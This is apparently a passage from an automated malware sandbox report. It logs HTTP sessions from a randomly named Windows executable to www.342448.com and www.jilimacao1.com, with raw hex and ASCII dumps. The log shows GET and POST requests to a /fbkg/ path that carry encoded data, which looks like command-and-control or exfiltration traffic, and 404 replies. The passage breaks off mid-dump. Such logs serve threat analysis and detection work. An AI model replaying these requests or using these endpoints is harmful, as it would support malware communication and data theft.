                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                2104.21.46.23680192.168.11.2050129C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:25:57.122364044 CET297OUTGET /fbkg/?Nx1L1=526dgl_phJ&T6I=LfqpcTqkrXaBnJID5l2tM8vOpSRv3MUMZfXyeB4RyH13MNyf/Jo5B8vwZE/hs/QEee4rKHvEo4v47oiItb+YS33BVH+SYzpbOQ== HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.342448.com
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:25:57.723999977 CET299INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:25:57 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=66BMUASONtsNX4ex8wowfBWUZj99EdJQtll2k48W1iemWCVKgawFSCKu6yz8cpevrLLHHz%2FO8dm1Fq%2BkQPEJe5pAhTYqdadBjBPWnzgKFbiVc2Cc26SkrHx5sXS%2BKc3SZA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 827a04ec59c243c2-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                Data Raw: 34 37 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f
                                                                                                                                                                                                Data Ascii: 475<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;co
                                                                                                                                                                                                Nov 17, 2023 19:25:57.724087000 CET299INData Raw: 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b
                                                                                                                                                                                                Data Ascii: lor:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1
                                                                                                                                                                                                Nov 17, 2023 19:25:57.724144936 CET299INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                2192.168.11.2050129104.21.46.23680C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:25:57.122364044 CET297OUTGET /fbkg/?Nx1L1=526dgl_phJ&T6I=LfqpcTqkrXaBnJID5l2tM8vOpSRv3MUMZfXyeB4RyH13MNyf/Jo5B8vwZE/hs/QEee4rKHvEo4v47oiItb+YS33BVH+SYzpbOQ== HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.342448.com
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:25:57.723999977 CET299INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:25:57 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=66BMUASONtsNX4ex8wowfBWUZj99EdJQtll2k48W1iemWCVKgawFSCKu6yz8cpevrLLHHz%2FO8dm1Fq%2BkQPEJe5pAhTYqdadBjBPWnzgKFbiVc2Cc26SkrHx5sXS%2BKc3SZA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 827a04ec59c243c2-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                Data Raw: 34 37 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f
                                                                                                                                                                                                Data Ascii: 475<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;co
                                                                                                                                                                                                Nov 17, 2023 19:25:57.724087000 CET299INData Raw: 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b
                                                                                                                                                                                                Data Ascii: lor:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1
                                                                                                                                                                                                Nov 17, 2023 19:25:57.724144936 CET299INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                20192.168.11.205014734.126.191.8480C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:27:51.843705893 CET543OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.jilimacao1.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.jilimacao1.com
                                                                                                                                                                                                Referer: http://www.jilimacao1.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 4d 36 4c 33 6b 45 75 50 69 56 59 50 66 48 31 2f 45 31 4f 44 54 31 50 6c 52 5a 4a 31 45 78 4d 66 53 59 62 68 34 33 32 69 6a 66 73 46 41 6c 62 31 6e 74 55 4a 79 47 5a 55 46 6c 58 44 59 4f 44 4b 45 32 61 78 6e 4a 64 71 58 45 4c 53 7a 47 2f 44 35 7a 37 6e 52 65 58 36 39 70 62 77 6b 63 71 52 65 2b 46 36 34 76 54 48 33 4f 5a 66 39 76 6d 54 39 77 61 31 6a 4a 64 6e 33 33 63 76 4c 34 41 7a 4f 57 33 4c 77 49 46 51 47 56 4e 73 70 4c 56 46 4a 76 63 57 2b 6f 4d 77 34 48 77 78 57 63 78 48 2f 59 72 56 67 76 55 36 6e 71 50 32 44 37 53 79 5a 48 34 5a 71 41 6d 6d 58 67 4a 4a 31 65 43 4f 4d 68 74 6d 6e 58 61 30 44 5a 53 56 31 4b 55 4b 68 37 6a 68 53 74 2b 56 2f 36 52 35 74 53 56 41 6c 4d 2b 36 4e 2b 6e 50 6d 66 51 78 6e 51 34 39 64 55 64 37 54 6a 31 55 63 79 78 36 47 38 69 4a 69 54 6a 70 66 46 53 4f 71 75 69 49 49 56 35 69 2b 62 54 38 73 71 61 69 78 63 32 6a 65 7a 71 39 32 4f 6b 4d 6c 69 70 7a 38 32 49 4c 47 52 72 52 52 5a 6c 65 66 71 66 74 48 6d 65 45 50 5a 6c 57 66 4c 46 2f 30 45 6f 36 37 6c 51 55 41 46 57 52 64 48 58 68 79 7a 44 48 32 6b 49 74 43 62 6a 78 41 36 6d 34 5a 51 70 6d 4c 63 4f 79 79 33 6d 44 56 36 63 32 73 52 49 52 62 61 79 34 4e 36 71 41 66 2f 62 74 74 37 37 51 44 46 6c 2f 67 50 42 64 79 6c 58 50 38 57 53 48 6c 36 61 57 43 35 76 68 67 2f 67 63 4e 39 31 6e 68 58 34 51 59 48 76 75 65 53 6f 74 79 43 59 52 4f 63 47 39 53 73 42 34 70 62 56 57 35 69 34 53 71 4a 59 68 75 33 72 35 54 67 37 35 7a 47 77 49 4a 67 33 77 70 2b 59 72 6a 73 63 76 36 70 67 68 31 66 52 4e 4b 57 6c 38 34 57 65 32 62 76 77 58 71 4b 4b 50 6e 56 2b 38 57 41 68 54 33 31 59 3d
                                                                                                                                                                                                Data Ascii: T6I=M6L3kEuPiVYPfH1/E1ODT1PlRZJ1ExMfSYbh432ijfsFAlb1ntUJyGZUFlXDYODKE2axnJdqXELSzG/D5z7nReX69pbwkcqRe+F64vTH3OZf9vmT9wa1jJdn33cvL4AzOW3LwIFQGVNspLVFJvcW+oMw4HwxWcxH/YrVgvU6nqP2D7SyZH4ZqAmmXgJJ1eCOMhtmnXa0DZSV1KUKh7jhSt+V/6R5tSVAlM+6N+nPmfQxnQ49dUd7Tj1Ucyx6G8iJiTjpfFSOquiIIV5i+bT8sqaixc2jezq92OkMlipz82ILGRrRRZlefqftHmeEPZlWfLF/0Eo67lQUAFWRdHXhyzDH2kItCbjxA6m4ZQpmLcOyy3mDV6c2sRIRbay4N6qAf/btt77QDFl/gPBdylXP8WSHl6aWC5vhg/gcN91nhX4QYHvueSotyCYROcG9SsB4pbVW5i4SqJYhu3r5Tg75zGwIJg3wp+Yrjscv6pgh1fRNKWl84We2bvwXqKKPnV+8WAhT31Y=
                                                                                                                                                                                                Nov 17, 2023 19:27:52.531224012 CET544OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.jilimacao1.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.jilimacao1.com
                                                                                                                                                                                                Referer: http://www.jilimacao1.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 4d 36 4c 33 6b 45 75 50 69 56 59 50 66 48 31 2f 45 31 4f 44 54 31 50 6c 52 5a 4a 31 45 78 4d 66 53 59 62 68 34 33 32 69 6a 66 73 46 41 6c 62 31 6e 74 55 4a 79 47 5a 55 46 6c 58 44 59 4f 44 4b 45 32 61 78 6e 4a 64 71 58 45 4c 53 7a 47 2f 44 35 7a 37 6e 52 65 58 36 39 70 62 77 6b 63 71 52 65 2b 46 36 34 76 54 48 33 4f 5a 66 39 76 6d 54 39 77 61 31 6a 4a 64 6e 33 33 63 76 4c 34 41 7a 4f 57 33 4c 77 49 46 51 47 56 4e 73 70 4c 56 46 4a 76 63 57 2b 6f 4d 77 34 48 77 78 57 63 78 48 2f 59 72 56 67 76 55 36 6e 71 50 32 44 37 53 79 5a 48 34 5a 71 41 6d 6d 58 67 4a 4a 31 65 43 4f 4d 68 74 6d 6e 58 61 30 44 5a 53 56 31 4b 55 4b 68 37 6a 68 53 74 2b 56 2f 36 52 35 74 53 56 41 6c 4d 2b 36 4e 2b 6e 50 6d 66 51 78 6e 51 34 39 64 55 64 37 54 6a 31 55 63 79 78 36 47 38 69 4a 69 54 6a 70 66 46 53 4f 71 75 69 49 49 56 35 69 2b 62 54 38 73 71 61 69 78 63 32 6a 65 7a 71 39 32 4f 6b 4d 6c 69 70 7a 38 32 49 4c 47 52 72 52 52 5a 6c 65 66 71 66 74 48 6d 65 45 50 5a 6c 57 66 4c 46 2f 30 45 6f 36 37 6c 51 55 41 46 57 52 64 48 58 68 79 7a 44 48 32 6b 49 74 43 62 6a 78 41 36 6d 34 5a 51 70 6d 4c 63 4f 79 79 33 6d 44 56 36 63 32 73 52 49 52 62 61 79 34 4e 36 71 41 66 2f 62 74 74 37 37 51 44 46 6c 2f 67 50 42 64 79 6c 58 50 38 57 53 48 6c 36 61 57 43 35 76 68 67 2f 67 63 4e 39 31 6e 68 58 34 51 59 48 76 75 65 53 6f 74 79 43 59 52 4f 63 47 39 53 73 42 34 70 62 56 57 35 69 34 53 71 4a 59 68 75 33 72 35 54 67 37 35 7a 47 77 49 4a 67 33 77 70 2b 59 72 6a 73 63 76 36 70 67 68 31 66 52 4e 4b 57 6c 38 34 57 65 32 62 76 77 58 71 4b 4b 50 6e 56 2b 38 57 41 68 54 33 31 59 3d
                                                                                                                                                                                                Data Ascii: T6I=M6L3kEuPiVYPfH1/E1ODT1PlRZJ1ExMfSYbh432ijfsFAlb1ntUJyGZUFlXDYODKE2axnJdqXELSzG/D5z7nReX69pbwkcqRe+F64vTH3OZf9vmT9wa1jJdn33cvL4AzOW3LwIFQGVNspLVFJvcW+oMw4HwxWcxH/YrVgvU6nqP2D7SyZH4ZqAmmXgJJ1eCOMhtmnXa0DZSV1KUKh7jhSt+V/6R5tSVAlM+6N+nPmfQxnQ49dUd7Tj1Ucyx6G8iJiTjpfFSOquiIIV5i+bT8sqaixc2jezq92OkMlipz82ILGRrRRZlefqftHmeEPZlWfLF/0Eo67lQUAFWRdHXhyzDH2kItCbjxA6m4ZQpmLcOyy3mDV6c2sRIRbay4N6qAf/btt77QDFl/gPBdylXP8WSHl6aWC5vhg/gcN91nhX4QYHvueSotyCYROcG9SsB4pbVW5i4SqJYhu3r5Tg75zGwIJg3wp+Yrjscv6pgh1fRNKWl84We2bvwXqKKPnV+8WAhT31Y=
                                                                                                                                                                                                Nov 17, 2023 19:27:53.289205074 CET545INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Content-Length: 548
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:27:52 GMT
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                X-Cache: BYPASS
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                2034.126.191.8480192.168.11.2050147C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:27:51.843705893 CET543OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.jilimacao1.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.jilimacao1.com
                                                                                                                                                                                                Referer: http://www.jilimacao1.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 4d 36 4c 33 6b 45 75 50 69 56 59 50 66 48 31 2f 45 31 4f 44 54 31 50 6c 52 5a 4a 31 45 78 4d 66 53 59 62 68 34 33 32 69 6a 66 73 46 41 6c 62 31 6e 74 55 4a 79 47 5a 55 46 6c 58 44 59 4f 44 4b 45 32 61 78 6e 4a 64 71 58 45 4c 53 7a 47 2f 44 35 7a 37 6e 52 65 58 36 39 70 62 77 6b 63 71 52 65 2b 46 36 34 76 54 48 33 4f 5a 66 39 76 6d 54 39 77 61 31 6a 4a 64 6e 33 33 63 76 4c 34 41 7a 4f 57 33 4c 77 49 46 51 47 56 4e 73 70 4c 56 46 4a 76 63 57 2b 6f 4d 77 34 48 77 78 57 63 78 48 2f 59 72 56 67 76 55 36 6e 71 50 32 44 37 53 79 5a 48 34 5a 71 41 6d 6d 58 67 4a 4a 31 65 43 4f 4d 68 74 6d 6e 58 61 30 44 5a 53 56 31 4b 55 4b 68 37 6a 68 53 74 2b 56 2f 36 52 35 74 53 56 41 6c 4d 2b 36 4e 2b 6e 50 6d 66 51 78 6e 51 34 39 64 55 64 37 54 6a 31 55 63 79 78 36 47 38 69 4a 69 54 6a 70 66 46 53 4f 71 75 69 49 49 56 35 69 2b 62 54 38 73 71 61 69 78 63 32 6a 65 7a 71 39 32 4f 6b 4d 6c 69 70 7a 38 32 49 4c 47 52 72 52 52 5a 6c 65 66 71 66 74 48 6d 65 45 50 5a 6c 57 66 4c 46 2f 30 45 6f 36 37 6c 51 55 41 46 57 52 64 48 58 68 79 7a 44 48 32 6b 49 74 43 62 6a 78 41 36 6d 34 5a 51 70 6d 4c 63 4f 79 79 33 6d 44 56 36 63 32 73 52 49 52 62 61 79 34 4e 36 71 41 66 2f 62 74 74 37 37 51 44 46 6c 2f 67 50 42 64 79 6c 58 50 38 